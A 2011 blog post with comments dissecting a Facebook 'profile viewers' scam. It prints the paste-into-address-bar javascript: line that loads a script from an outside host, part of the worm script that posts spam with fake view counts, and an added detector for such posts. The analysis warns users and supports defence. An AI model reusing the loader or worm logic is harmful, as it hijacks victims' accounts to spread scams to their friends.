See who viewed your Facebook profile - Scam!
For the last couple days some sort of malware infected a number of my friends' Facebook accounts. I got hundreds of Event Invitations, chats and messages about a new app which is claimed to able to help you to view your Profile visitors. All these messages had a url-shortened link to a malware site.
Now, this is my theory on how this might be spreading (btw. I never clicked on that link). When a Facebook user clicks on that URL it will trigger a JavaScript from an external URL.
Possibility 1: That JS would run in the context of facebook.com, hence get access to your cookies and post the messages/chats etc.
Possibility 2: That JS would interact with the other browser window/tab where Facebook is open and inject the message in the user's context.
I believe the second one is the more likely candidate.
Update:-
Today I decided to check one of those URLs in a sandboxed Google Chrome. Well, it is not as sophisticated as I'd hoped!
The page apparently asks the user to copy-paste the following JavaScript code into the browser address bar and click Go.
Code:
javascript:(a=(b=document).createElement('script')).src='//bbbindia4.in/jsp.php',b.body.appendChild(a);void(0)
The source from that php file is this:
Code:
var randomnumber=Math.floor(Math.random()*99999);
var randomnumber1=Math.floor(Math.random()*987);
var randomnumber2=Math.floor(Math.random()*754);
var randomnumber3=Math.floor(Math.random()*43);
var randomnumber4=Math.floor(Math.random()*9);
var random=Math.floor(Math.random()*5);
if (random == 1) { var url = 'http://super-kewl.appspot.com/?' }
else if (random == 2) { var url = 'http://wonder-land.appspot.com/?' }
else if (random == 3) { var url = 'http://go-see.appspot.com/?' }
else if (random == 4) { var url = 'http://you-rockz.appspot.com/?' }
else { var url = 'http://must-click.appspot.com/?' }
var message = '%firstname% See who views your profile ';
var ev = 'check out this new facebook feature! \x0A see your profile view results by copying and pasting the link below in the address bar \x0A ';
var test = 'My Top Profile Viewers Are:\x0A';
var id = '%tf% - ' + randomnumber1 + ' views,\x0A';
var id1 = '%tf% - ' + randomnumber2 + ' views,\x0A';
var id2 = '%tf% - ' + randomnumber3 + ' views,\x0A';
var id3 = '%tf% - ' + randomnumber4 + ' views,\x0A';
var post = ' see who viewed your facebook profile @ ';
var postmessage = test + id + id1 + id2 + id3 + post + url + randomnumber;
var chatmessage = message + url + randomnumber;
var redirect = 'http://downl0adgames.blogspot.com/';
var eventdesc = ev + url + randomnumber;
var eventname = 'new facebook feature :o';
var nfriends = 5000; //
See how the "Profile visit count" is generated using random numbers!!!
Code:
randomnumber3=Math.floor(Math.random()*43);
But even with such a lame trick the authors of this scam managed to infect a large number of Facebook users (from IT Project Managers to school children).
The current version of the script produces wall posts like the one shown below:
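As an added illustration (not part of the original post), here is a defender-side heuristic that flags wall posts matching the template the jsp.php script above builds: the fixed header line, exactly four "name - N views," lines whose counts fall inside the Math.random() bounds, the trailing phrase, and one of the five hard-coded appspot hosts followed by a numeric query. The sample posts are constructed, and the function and constant names are my own.

```javascript
// Added example, not code from the original post: heuristic detector for the
// wall-post template generated by the scam script quoted above.

// Hosts hard-coded in the scam script (taken from the quoted source).
const SCAM_HOSTS = new Set([
  'super-kewl.appspot.com', 'wonder-land.appspot.com', 'go-see.appspot.com',
  'you-rockz.appspot.com', 'must-click.appspot.com',
]);

// Multipliers of the four Math.random() calls that fake the view counts, so the
// generated counts are always strictly below these values, in this order.
const VIEW_BOUNDS = [987, 754, 43, 9];

function analyzeWallPost(text) {
  const lines = text.split('\n').map((l) => l.trim()).filter(Boolean);
  const indicators = [];

  if (lines[0] === 'My Top Profile Viewers Are:') indicators.push('header');

  // The script always emits exactly four "<name> - <n> views," lines.
  const viewLines = lines.filter((l) => /^.+ - \d+ views,$/.test(l));
  if (viewLines.length === 4) {
    indicators.push('four-view-lines');
    const counts = viewLines.map((l) => Number(l.match(/ - (\d+) views,$/)[1]));
    if (counts.every((c, i) => c < VIEW_BOUNDS[i])) indicators.push('counts-within-random-bounds');
  }

  // The link is always "<host>/?<random number>" with no parameter name.
  const urlMatch = text.match(/https?:\/\/([^\/\s]+)\/\?(\d+)\b/);
  if (urlMatch) {
    if (SCAM_HOSTS.has(urlMatch[1])) indicators.push('known-scam-host');
    if (Number(urlMatch[2]) < 99999) indicators.push('numeric-random-query');
  }
  if (/see who viewed your facebook profile @/i.test(text)) indicators.push('tail-phrase');

  // Require several independent indicators before calling it a scam post.
  return { scam: indicators.length >= 3, indicators };
}

// Constructed sample posts (not captured from a real account).
const SAMPLE_SCAM_POST = [
  'My Top Profile Viewers Are:',
  'Alice Example - 412 views,',
  'Bob Example - 311 views,',
  'Carol Example - 17 views,',
  'Dave Example - 3 views,',
  ' see who viewed your facebook profile @ http://go-see.appspot.com/?48213',
].join('\n');
const SAMPLE_BENIGN_POST = 'Check out my new blog post @ http://example.org/?42';
```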
Total Comments 3
Comments
-
Mr. strider.. Thanks for such a wonderful knowledge-sharing post.. we owe you for this.. Thanks... check this out for some more knowledge regarding the same link:
YouTube - How to see who viewed your profile-BEWARE-FACEBOOKSCAM.wmv: http://www.youtube.com/watch?v=ThSjD5qKq4g
Posted 24-04-2011 at 02:50 PM by WebJockey
-
Some people are kinda dumb...
Never click a shortened URL unless you lengthen it (there are services to do that), for example ExpandMyURL.com ("Preview Short URLs | Lengthen ShortURLs so You Know where Your Going | Preventing Nasty Link Surprises").
If the site you are going to is not anything like the one you think it is, then don't click on it. If it is suspicious, google it along with the keywords FACEBOOK and SCAM. And it's always best to be safe.
Posted 25-04-2011 at 09:19 AM by maxmanrules
-
Posted 03-05-2011 at 07:11 PM by shawnpb